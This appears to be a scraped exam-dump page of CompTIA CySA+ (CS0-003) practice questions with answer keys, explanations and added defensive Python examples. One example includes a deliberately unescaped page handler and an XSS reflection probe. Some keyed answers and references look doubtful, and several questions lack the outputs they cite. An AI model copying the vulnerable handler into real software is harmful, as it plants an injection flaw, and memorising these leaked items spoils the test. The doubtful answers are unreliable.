Exam4Training

CompTIA CS0-003 CompTIA Cybersecurity Analyst (CySA+) Exam Online Training

Question #1

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability.

Which of the following CVE metrics would be most accurate for this zero-day threat?

  • A . CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
  • B . CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
  • C . CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
  • D . CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Correct Answer: A

Explanation:

Option A matches the description: network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), unchanged scope (S:U) and high confidentiality and integrity impact (C:H/I:H). Taken literally, "no impact to availability" is A:N rather than the A:L in option A, but A is the only option that is network-reachable with no privileges, no user interaction and high C/I impact, so it is the closest fit; it scores 9.4 (Critical) with A:L and 9.1 with A:N. The other vectors require privileges or user interaction, or rate confidentiality low.

Reference: https://nvd.nist.gov/vuln-metrics/cvss

Question #2

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

  • A . PAM
  • B . IDS
  • C . PKI
  • D . DLP

Correct Answer: D

Explanation:

Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.

Question #3

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

  • A . Set an HttpOnly flag to force communication by HTTPS
  • B . Block requests without an X-Frame-Options header
  • C . Configure an Access-Control-Allow-Origin header to authorized domains
  • D . Disable the cross-origin resource sharing header

Correct Answer: B

Explanation:

The output shows that the corporate website can be loaded inside a frame on another origin, which enables clickjacking: an attacker overlays a transparent frame of the legitimate page on a decoy page and tricks users into clicking controls they cannot see. The remediation is for the server to send an X-Frame-Options response header (DENY or SAMEORIGIN) on every page, which instructs the browser not to render the page inside a frame; the modern equivalent is the Content-Security-Policy frame-ancestors directive, which takes precedence when both are present. HttpOnly (option A) is a cookie attribute that keeps scripts from reading a cookie and does not force HTTPS; options C and D concern cross-origin resource sharing, which governs script access to responses, not framing.
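The check behind this finding, written out as an added example (not code from the original page): given a page's response headers, decide whether a foreign origin may frame it. It handles both X-Frame-Options and CSP frame-ancestors, including the rule that the CSP directive wins when both are present. The origins www.example.com and attacker.example are assumptions used only for the demonstration.

```python
"""Added example (not from the original page): decide from response headers
whether another origin can frame a page, the condition behind the clickjacking
finding in Question 3. Per CSP Level 2, a frame-ancestors directive takes
precedence over X-Frame-Options when both are present."""


def frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def framing_allowed(headers: dict, page_origin: str, framer_origin: str) -> bool:
    """True if framer_origin may embed the page served with these headers.
    Header names are compared case-insensitively, as HTTP requires."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy")
    if csp is not None:
        ancestors = frame_ancestors(csp)
        if ancestors is not None:          # CSP decides; X-Frame-Options is ignored
            if "none" in ancestors:
                return False
            if "*" in ancestors:
                return True
            if "self" in ancestors and framer_origin == page_origin:
                return True
            return framer_origin.lower() in ancestors
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer_origin == page_origin
    # No recognised protection: any origin can frame the page (the scanner's finding).
    return True


# Assumed origins for the demonstration only.
PAGE = "https://www.example.com"
ATTACKER = "https://attacker.example"


def clickjacking_finding(headers: dict) -> str:
    """Tuning recommendation in the style of the report in Question 3."""
    if framing_allowed(headers, PAGE, ATTACKER):
        return "Add X-Frame-Options: DENY (or CSP frame-ancestors 'none') to all responses"
    return "Framing protection present"


if __name__ == "__main__":
    print(clickjacking_finding({"Content-Type": "text/html"}))
    print(clickjacking_finding({"X-Frame-Options": "SAMEORIGIN"}))
```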

Question #4

Which of the following items should be included in a vulnerability scan report? (Choose two.)

  • A . Lessons learned
  • B . Service-level agreement
  • C . Playbook
  • D . Affected hosts
  • E . Risk score
  • F . Education plan

Correct Answer: D, E

Explanation:

A vulnerability scan report should list the affected hosts (IP addresses, hostnames, operating systems and services) and a risk score for each finding, typically derived from the CVSS base score and adjusted for asset criticality, so that remediation can be prioritized. Lessons learned, playbooks, service-level agreements and education plans belong to incident response and program documentation, not to a scan report.

Reference: https://www.first.org/cvss/

Question #5

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.

Which of the following would best protect this organization?

  • A . A mean time to remediate of 30 days
  • B . A mean time to detect of 45 days
  • C . A mean time to respond of 15 days
  • D . Third-party application testing

Correct Answer: A

Explanation:

Mean time to remediate (MTTR) measures how long a vulnerability stays open after it is discovered. If exploitation of new attacks typically begins about 45 days after a patch is released, an MTTR of 30 days ensures the patches are applied before exploits appear. A mean time to detect of 45 days (B) is too late, mean time to respond (C) measures incident handling rather than patching, and third-party application testing (D) does not shorten the patch window.

Question #6

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious.

Given the following script:

Which of the following scripting languages was used in the script?

  • A . PowerShell
  • B . Ruby
  • C . Python
  • D . Shell script

Correct Answer: A

Explanation:

The script uses PowerShell syntax: Verb-Noun cmdlets (such as Get-Process or Invoke-WebRequest), -Parameter switches, $-prefixed variables and # comments. PowerShell is a scripting language used to automate tasks and manage Windows systems, which also makes it a common vehicle for living-off-the-land attacks, so an unfamiliar production script in it deserves review.

Question #7

A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP; other times it is accessible through HTTPS.

Which of the following most likely describes the observed activity?

  • A . There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
  • B . An on-path attack is being performed by someone with internal access that forces users into port 80
  • C . The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
  • D . An error was caused by BGP due to new rules applied over the company’s internal routers

Correct Answer: B

Explanation:

An on-path (man-in-the-middle) attack is one in which an attacker positioned between two parties intercepts and modifies their traffic. Here someone with internal access is intermittently downgrading users from HTTPS on port 443 to plain HTTP on port 80, where credentials cross the network in cleartext; that explains both symptoms, the compromised accounts and a portal that is sometimes reachable only over HTTP. A certificate problem (A) or an overloaded server (C) would not silently move users to HTTP, and a BGP routing error (D) would not change the protocol users connect with. Serving the portal only over HTTPS with HSTS enabled removes the downgrade path.

Question #11

The Company shall prioritize patching of publicly available systems and services over patching of internally available systems.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A) through D): vulnerability details shown as images (not reproduced here)

  • A . Option A
  • B . Option B
  • C . Option C
  • D . Option D

Correct Answer: C

Explanation:

According to the security policy, the company shall use the CVSSv3.1 Base Score Metrics to prioritize the remediation of security vulnerabilities. Option C has the highest CVSSv3.1 Base Score of 9.8, which indicates a critical severity level. The company shall also prioritize confidentiality of data over availability of systems and data, and option C has a high impact on confidentiality (C:H). Finally, the company shall prioritize patching of publicly available systems and services over patching of internally available systems, and option C affects a public-facing web server.

Reference: https://www.first.org/cvss/

Question #12

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

  • A . Business continuity plan
  • B . Vulnerability management plan
  • C . Disaster recovery plan
  • D . Asset management plan

Correct Answer: C

Explanation:

A disaster recovery plan (DRP) defines how IT systems and services are restored after a disruptive event: the recovery time and recovery point objectives for each mission-critical service, the backups, alternate sites and procedures used to bring it back, and who executes them. A business continuity plan is broader and covers keeping the business operating as a whole; the DRP is the component that specifically restores the services themselves. Vulnerability and asset management plans do not address availability during an incident.

Question #13

The Chief Information Security Officer wants to eliminate or reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization.

Which of the following solutions will assist in reducing the risk?

  • A . Deploy a CASB and enable policy enforcement
  • B . Configure MFA with strict access
  • C . Deploy an API gateway
  • D . Enable SSO to the cloud applications

Correct Answer: A

Explanation:

A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

Question #14

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack.

Which of the following logs should the team review first?

  • A . CDN
  • B . Vulnerability scanner
  • C . DNS
  • D . Web server

Correct Answer: C

Explanation:

A distributed denial-of-service (DDoS) attack floods a target’s network or servers with traffic from many sources. Because users at several locations lost access to external SaaS at the same time, the shared dependency is name resolution: DNS resolvers are a frequent DDoS target (floods of queries, often reflected or amplified), and if they cannot answer, every external service appears to be down. The DNS logs show whether resolution failed, where the query flood came from and when it started, which is why they are reviewed first. CDN and web server logs cover the organization’s own public services, not outbound access to SaaS, and a vulnerability scanner has nothing to say about an outage.

Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

Question #15

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack.

Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

  • A . Weaponization
  • B . Reconnaissance
  • C . Delivery
  • D . Exploitation

Correct Answer: D

Explanation:

The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. In the exploitation stage the attacker uses the access gained through delivery (here, social engineering) to execute code or obtain a foothold on the target network. The actor has already gained access and now wants to keep it, so the remaining listed stages (reconnaissance, weaponization, delivery) are behind them. Establishing persistence so as not to lose access formally belongs to the next stage, installation, which is not among the choices; of the stages offered, exploitation is the one the actor has reached.

Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question #16

An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets.

Which of the following steps of an attack framework is the analyst witnessing?

  • A . Exploitation
  • B . Reconnaissance
  • C . Command and control
  • D . Actions on objectives

Correct Answer: B

Explanation:

Reconnaissance is the first stage of the Cyber Kill Chain: the attacker researches the target before attacking, identifying systems and their vulnerabilities, connected third parties and possible entry points. Reconnaissance can be passive (public sources, DNS records, leaked data) or active (probing the target directly). Port scans and vulnerability scans of external-facing assets from an outside IP address are active reconnaissance, so the analyst is witnessing that stage. The practical response is to record the source address, check it against threat intelligence, and watch for later exploitation attempts from it against the services it enumerated.

Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question #17

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country.

Which of the following best describes what is happening? (Choose two.)

  • A . Beaconing
  • B . Domain Name System hijacking
  • C . Social engineering attack
  • D . On-path attack
  • E . Obfuscated links
  • F . Address Resolution Protocol poisoning

Correct Answer: C, E

Explanation:

A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or coercing users into performing actions that benefit the attacker, such as clicking on malicious links, divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. This indicates that the analyst is witnessing a social engineering attack using obfuscated links.

Question #18

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application.

Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

  • A . Conduct regular red team exercises over the application in production
  • B . Ensure that all implemented coding libraries are regularly checked
  • C . Use application security scanning as part of the pipeline for the CI/CD flow
  • D . Implement proper input validation for any data entry form

Correct Answer: C

Explanation:

Application security scanning tests applications for vulnerabilities such as injection flaws, broken authentication, cross-site scripting and insecure configuration. Finding the same vulnerabilities release after release means they are reintroduced during development and only caught afterwards in production scans. Running application security scanning (static and dependency analysis at build time, dynamic testing in a staging deployment) as a stage of the continuous integration/continuous delivery (CI/CD) pipeline catches them automatically on every change, before the build is promoted, and can fail the build when a known class of flaw reappears. Red team exercises (A), library checks (B) and input validation (D) each address only part of the problem or act too late.

Question #19

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to.

Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

  • A . Proprietary systems
  • B . Legacy systems
  • C . Unsupported operating systems
  • D . Lack of maintenance windows

Correct Answer: A

Explanation:

Proprietary systems are owned and controlled by a specific vendor and use closed software, hardware or protocols that the customer cannot inspect or modify. They inhibit remediation because the customer cannot patch them directly and depends on the vendor’s release schedule. Here two critical systems cannot be upgraded because they are vendor appliances the company has no access to, which is exactly this case. The usual responses are compensating controls, such as network segmentation or virtual patching in front of the appliance, and an escalation to the vendor with a documented risk acceptance in the meantime.

Question #20

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

  • A . An output of characters > and " as the parameters used in the attempt
  • B . The vulnerable parameter ID http://172.31.15.2/1.php?id=2 and unfiltered characters returned
  • C . The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
  • D . The vulnerable parameter and characters > and " with a reflected XSS attempt

Correct Answer: D

Explanation:

A cross-site scripting (XSS) attack injects malicious script into a web page that is then executed by a victim’s browser. In a reflected XSS attack the payload is placed in a URL or form parameter, sent to the web server and reflected back into the response. Here the Nmap output (the format produced by the http-unsafe-output-escaping NSE script) reports that the characters > and " sent in the id parameter of http://172.31.15.2/1.php?id=2 are returned without filtering or encoding. That is a reflected XSS attempt succeeding against the vulnerable parameter id, which is what option D states; the fix is to HTML-encode the parameter before placing it in the page.
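As an added example (not part of the original page or of Nmap), the following Python mirrors what the scan did: a deliberately vulnerable page handler that echoes the id parameter, its hardened counterpart using HTML entity encoding, and a reflection probe that reports which unsafe characters come back literally, in the same wording Nmap’s http-unsafe-output-escaping script uses. The handlers and the probe token are constructed stand-ins so it runs offline; against a live server the probe would send the same request over HTTP.

```python
"""Added example (not from the original page or from Nmap): a vulnerable page
handler beside its hardened form, and a reflection probe in the spirit of the
http-unsafe-output-escaping NSE script. The handlers replace a real HTTP
request so the check runs offline; the URL and parameter follow Question 20."""
import html
from urllib.parse import parse_qs, urlsplit

UNSAFE = ['"', "'", "<", ">"]
PROBE_TOKEN = "ghz"   # constructed marker so the probe can find its own reflection


def render_vulnerable(query: dict) -> str:
    """Echoes the id parameter straight into HTML (the flaw behind reflected XSS)."""
    item = query.get("id", [""])[0]
    return f"<html><body><p>Item: {item}</p></body></html>"


def render_hardened(query: dict) -> str:
    """Same page with HTML entity encoding applied to the untrusted value."""
    item = html.escape(query.get("id", [""])[0], quote=True)
    return f"<html><body><p>Item: {item}</p></body></html>"


def probe_reflection(handler, url: str, param: str) -> list:
    """Send <token><unsafe chars><token> in `param` and report which unsafe
    characters appear literally between the tokens in the response."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    query[param] = [PROBE_TOKEN + "".join(UNSAFE) + PROBE_TOKEN]
    body = handler(query)
    start = body.find(PROBE_TOKEN)
    end = body.find(PROBE_TOKEN, start + len(PROBE_TOKEN))
    if start < 0 or end < 0:
        return []                      # parameter is not reflected at all
    reflected = body[start + len(PROBE_TOKEN):end]
    return [c for c in UNSAFE if c in reflected]


def report(handler, url: str, param: str) -> str:
    """Format the result the way Nmap does: 'Characters [> "] reflected in parameter ...'."""
    chars = probe_reflection(handler, url, param)
    if not chars:
        return f"No unsafe characters reflected in parameter {param} at {url}"
    return f"Characters [{' '.join(chars)}] reflected in parameter {param} at {url}"


if __name__ == "__main__":
    url = "http://172.31.15.2/1.php?id=2"
    print(report(render_vulnerable, url, "id"))
    print(report(render_hardened, url, "id"))
```

The hardened handler returns no literal unsafe characters because html.escape turns each of them into an entity, which is exactly the property the scanner is testing for.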

Question #21

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

  • A . Develop a call tree to inform impacted users
  • B . Schedule a review with all teams to discuss what occurred
  • C . Create an executive summary to update company leadership
  • D . Review regulatory compliance with public relations for official notification

Correct Answer: B

Explanation:

One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.

Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

Question #22

A security analyst received a malicious binary file to analyze.

Which of the following is the best technique to perform the analysis?

  • A . Code analysis
  • B . Static analysis
  • C . Reverse engineering
  • D . Fuzzing

Correct Answer: C

Explanation:

Reverse engineering is the technique of analyzing a binary file to understand its structure, functionality and behavior when no source code is available. It supports malware analysis, vulnerability research, exploit development and software debugging, and is done with disassemblers, debuggers, decompilers and hex editors. Static analysis (B) and code analysis (A) are parts of that process rather than the full technique, and fuzzing (D) is used to find bugs in software you are testing, not to understand a malicious sample.

Question #23

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation.

Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

  • A . Hard disk
  • B . Primary boot partition
  • C . Malicious files
  • D . Routing table
  • E . Static IP address

Correct Answer: A

Explanation:

The hard disk is the piece of data that should be collected first in order to preserve sensitive information before isolating the server. It holds the files and data on the server that may evidence malicious activity, such as malware installation, data exfiltration or configuration changes, and isolating or rebooting the server could alter or destroy some of it. The disk should be acquired with proper forensic technique: a bit-for-bit image made through a write blocker, with a cryptographic hash (for example SHA-256) of the source and the image recorded so integrity can be demonstrated later. Where the tooling allows it, volatile data such as memory is captured before the disk, following the order of volatility.

Question #24

Which of the following security operations tasks are ideal for automation?

  • A . Suspicious file analysis:
    – Look for suspicious-looking graphics in a folder.
    – Create subfolders in the original folder based on category of graphics found.
    – Move the suspicious graphics to the appropriate subfolder.
  • B . Firewall IoC block actions:
    – Examine the firewall logs for IoCs from the most recently published zero-day exploit.
    – Take mitigating actions in the firewall to block the behavior found in the logs.
    – Follow up on any false positives that were caused by the block rules.
  • C . Security application user errors:
    – Search the error logs for signs of users having trouble with the security application.
    – Look up the user’s phone number.
    – Call the user to help with any questions about using the application.
  • D . Email header analysis:
    – Check the email header for a phishing confidence metric greater than or equal to five.
    – Add the domain of sender to the block list.
    – Move the email to quarantine.

Correct Answer: D

Explanation:

Email header analysis is the task best suited to automation: each step is a deterministic rule on structured input (compare a numeric phishing-confidence header to a threshold, extract the sender domain, add it to a block list, move the message to quarantine), with no human judgment needed, so a SOAR playbook or a script can parse the headers and act on them. The other options are poor candidates: classifying "suspicious-looking" graphics (A) and deciding which zero-day block rules produced false positives (B) require analyst judgment, and phoning users (C) is a human interaction.
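The playbook in option D as a script, added here as an example (not code from the original page): it parses a raw message with the standard library, reads a phishing-confidence score from a header, blocks the sender domain and quarantines the message when the score reaches five. The header name X-Phishing-Confidence and the two sample messages are assumptions constructed for this example; real mail gateways use their own header names.

```python
"""Added example (not from the original page): the email-header playbook from
option D. The header name X-Phishing-Confidence and the sample messages are
assumptions constructed for this example."""
from email import message_from_string
from email.utils import parseaddr

SCORE_HEADER = "X-Phishing-Confidence"   # assumed name of the gateway's score header
THRESHOLD = 5                            # quarantine at 5 or above, per option D


def sender_domain(msg) -> str:
    """Domain of the From address, lowercased; empty string if unparsable."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def phishing_score(msg) -> int:
    """Read the score header; treat a missing or non-numeric header as 0."""
    try:
        return int(msg.get(SCORE_HEADER, "0").strip())
    except ValueError:
        return 0


def triage(raw: str, blocklist: set) -> dict:
    """Apply the playbook: score >= THRESHOLD -> block sender domain and quarantine.
    A sender whose domain is already on the block list is quarantined regardless."""
    msg = message_from_string(raw)
    score = phishing_score(msg)
    domain = sender_domain(msg)
    if score >= THRESHOLD and domain:
        blocklist.add(domain)
        return {"action": "quarantine", "score": score, "domain": domain}
    if domain in blocklist:
        return {"action": "quarantine", "score": score, "domain": domain}
    return {"action": "deliver", "score": score, "domain": domain}


# Constructed sample messages (not real traffic).
SUSPICIOUS = """From: "IT Helpdesk" <helpdesk@login-verify.example>
To: admin@corp.example
Subject: Password expires today
X-Phishing-Confidence: 7

Click here to keep your account active.
"""

BENIGN = """From: Jane <jane@corp.example>
To: admin@corp.example
Subject: Lunch?
X-Phishing-Confidence: 1

Noon?
"""

if __name__ == "__main__":
    blocked = set()
    for raw in (SUSPICIOUS, BENIGN):
        print(triage(raw, blocked))
    print("blocklist:", blocked)
```

Blocking on the From domain is what the option describes; in production the decision should also consider the authenticated (SPF/DKIM-verified) domain, since the From header itself can be spoofed.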

Question #25

An organization has experienced a breach of customer transactions.

Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

  • A . PCI Security Standards Council
  • B . Local law enforcement
  • C . Federal law enforcement
  • D . Card issuer

Correct Answer: D

Explanation:

Under PCI DSS, an organization that suffers a breach of cardholder data must notify the parties in its payment chain; the expected answer here is the card issuer, the financial institution that issued the affected cards and that can re-issue them and monitor them for fraud. In practice notification goes through the merchant’s acquiring bank and the payment brands, each of which publishes its own incident reporting procedure and timeline. The PCI Security Standards Council maintains the standard but does not receive breach reports, and law enforcement, regulators and customers are notified under other legal obligations depending on the nature and scope of the breach.

Reference: https://www.pcisecuritystandards.org/

Question #26

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

  • A . Mean time to detect
  • B . Number of exploits by tactic
  • C . Alert volume
  • D . Quantity of intrusion attempts

Correct Answer: A

Explanation:

Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a security incident or threat from the time it occurs. MTTD can be improved by using tools and processes that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance security operations.

Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

Question #27

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment.

Which of the following implications should be considered on the new hybrid environment?

  • A . The current scanners should be migrated to the cloud
  • B . Cloud-specific misconfigurations may not be detected by the current scanners
  • C . Existing vulnerability scanners cannot scan IaaS systems
  • D . Vulnerability scans on cloud environments should be performed from the cloud

Correct Answer: B

Explanation:

Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.
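Two such checks, written here as an added example (not code from the original page or from any vendor’s scanner): a host-based scanner never performs them because the weakness lives in the cloud control plane rather than on a VM. Both operate on the kind of JSON the provider’s API returns, an S3-style bucket policy and a security-group ingress list; the sample documents, account ID and rule IDs are constructed for this example.

```python
"""Added example (not from the original page or a vendor scanner): two
control-plane misconfiguration checks that a host-based scanner cannot see.
Inputs are the JSON shapes a cloud API returns; samples are constructed."""
import ipaddress
import json


def is_public_principal(principal) -> bool:
    """AWS policy grammar: Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def public_bucket_statements(policy: dict) -> list:
    """Statement ids that grant access to everyone with no Condition limiting it."""
    findings = []
    for i, st in enumerate(policy.get("Statement", [])):
        if (st.get("Effect") == "Allow"
                and is_public_principal(st.get("Principal"))
                and not st.get("Condition")):
            findings.append(st.get("Sid", f"Statement[{i}]"))
    return findings


def open_admin_ports(rules: list, admin_ports=(22, 3389)) -> list:
    """(rule_id, port) pairs where an admin port is reachable from the whole internet."""
    findings = []
    for rule in rules:
        cidr = ipaddress.ip_network(rule["cidr"], strict=False)
        if cidr.prefixlen != 0:        # only 0.0.0.0/0 or ::/0 count as "anywhere"
            continue
        lo, hi = rule["from_port"], rule["to_port"]
        for port in admin_ports:
            if lo <= port <= hi:
                findings.append((rule["id"], port))
    return findings


# Constructed sample inputs (bucket name, account ID and rule IDs are made up).
BUCKET_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::backups-example/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::backups-example/*",
     "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-0example"}}},
    {"Sid": "Admins", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/Admin"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::backups-example/*"}
  ]
}""")

SG_RULES = [
    {"id": "sgr-1", "cidr": "0.0.0.0/0", "from_port": 443, "to_port": 443},
    {"id": "sgr-2", "cidr": "0.0.0.0/0", "from_port": 22, "to_port": 22},
    {"id": "sgr-3", "cidr": "10.0.0.0/8", "from_port": 3389, "to_port": 3389},
    {"id": "sgr-4", "cidr": "::/0", "from_port": 0, "to_port": 65535},
]

if __name__ == "__main__":
    print("public bucket statements:", public_bucket_statements(BUCKET_POLICY))
    print("admin ports open to the internet:", open_admin_ports(SG_RULES))
```

The VpcOnly statement is deliberately not flagged: a wildcard principal scoped by a Condition is a common legitimate pattern, and a check that ignores Conditions would drown real findings in false positives.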

Question #28

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation.

Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

  • A . Create a timeline of events detailing the date stamps, user account, hostname and IP information associated with the activities
  • B . Ensure that the case details do not reflect any user-identifiable information. Password protect the evidence and restrict access to personnel related to the investigation
  • C . Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
  • D . Notify the SOC manager for awareness after confirmation that the activity was intentional

Correct Answer: B

Explanation:

The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the case details do not reflect any user-identifiable information, such as name, email address, phone number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential discrimination or retaliation. Additionally, password protecting the evidence and restricting access to personnel related to the investigation can help preserve the integrity and security of the evidence and prevent any unauthorized or accidental disclosure or modification.

Question #29

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

  • A . Agree on the goals and objectives of the plan
  • B . Determine the site to be used during a disaster
  • C . Demonstrate adherence to a standard disaster recovery process
  • D . Identify applications to be run during a disaster

Correct Answer: A

Explanation:

The first step that should be performed when establishing a disaster recovery plan is to agree on the goals and objectives of the plan. The goals and objectives of the plan should define what the plan aims to achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting compliance requirements. The goals and objectives of the plan should also be aligned with the business needs and priorities of the organization and be measurable and achievable.

Question #30

A technician identifies a vulnerability on a server and applies a software patch.

Which of the following should be the next step in the remediation process?

  • A . Testing
  • B . Implementation
  • C . Validation
  • D . Rollback

Correct Answer: C

Explanation:

The next step in the remediation process after applying a software patch is validation. Validation is a process that involves verifying that the patch has been successfully applied, that it has fixed the vulnerability, and that it has not caused any adverse effects on the system or application functionality or performance. Validation can be done using various methods, such as scanning, testing, monitoring, or auditing.

Question #31

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

  • A . Registry change
  • B . Rename computer
  • C . New account introduced
  • D . Privilege escalation

Correct Answer: C

Explanation:

The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.
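Detection logic for the situation in this question, added here as an example (not code from the original page): it correlates Windows Security event 4720 (a user account was created) with event 4732 (a member was added to a security-enabled local group) for the Administrators group, so a newly introduced account that is made an administrator within a short window raises one alert rather than two unrelated events. The event IDs are the standard Windows ones; the log lines are constructed, and the example assumes the endpoint agent has already normalized them to JSON with account names (a raw 4732 event identifies the member by SID).

```python
"""Added example (not from the original page): correlate Windows Security
events 4720 (account created) and 4732 (member added to a local group) to
flag new accounts that are immediately made administrators. Records are
assumed to be agent-normalized JSON lines; the sample log is constructed."""
import json
from datetime import datetime, timedelta

ADMIN_GROUP = "Administrators"
WINDOW = timedelta(minutes=10)   # account created and elevated within this window


def parse_records(lines: str) -> list:
    """Parse newline-delimited JSON endpoint records, oldest first."""
    out = []
    for line in lines.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        out.append(rec)
    return sorted(out, key=lambda r: r["ts"])


def new_admin_accounts(lines: str) -> list:
    """Alerts for accounts created (4720) and then added to Administrators (4732)
    on the same host within WINDOW."""
    records = parse_records(lines)
    created = {}          # (host, account) -> creation time
    alerts = []
    for r in records:
        key = (r["host"], r["target"].lower())
        if r["event_id"] == 4720:
            created[key] = r["ts"]
        elif r["event_id"] == 4732 and r.get("group") == ADMIN_GROUP:
            if key in created and r["ts"] - created[key] <= WINDOW:
                alerts.append({
                    "host": r["host"],
                    "account": r["target"],
                    "by": r["subject"],
                    "elapsed_s": int((r["ts"] - created[key]).total_seconds()),
                })
    return alerts


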